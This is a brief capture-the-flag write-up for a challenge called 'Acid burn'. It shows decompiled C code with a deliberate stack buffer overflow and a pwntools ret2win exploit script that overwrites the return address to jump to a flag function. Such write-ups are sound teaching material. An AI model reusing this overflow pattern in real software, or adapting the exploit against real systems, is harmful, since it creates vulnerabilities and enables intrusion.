Acid burn

Here is the decompiled code for the challenge.

int main(void)
{
  int iVar1;
  char input [64];
  
  printf("What is the password?\n?: ");
  fflush(stdout);
  fgets(input,0x80,stdin);
  iVar1 = strcmp(input,"password\n");
  if (iVar1 != 0) {
    puts("incorrect password");
    fflush(stdout);
  }
  return 0;
}

There is a pretty large buffer overflow on the input variable and there also conveniently is a function called flag that displays the flag (and of course all the protections are disabled).
This is a classic ret2win scenario where we have to overwrite the return pointer to jump to the flag function.
A small python script using pwntools should do the job.

io = start()

payload = flat(
        b'A'*(64+8),
        pack(elf.symbols.flag))

write("payload", payload)
io.sendlineafter(b'?: ', payload)
io.interactive()

I didn’t save the flag but this works and solves the challenge.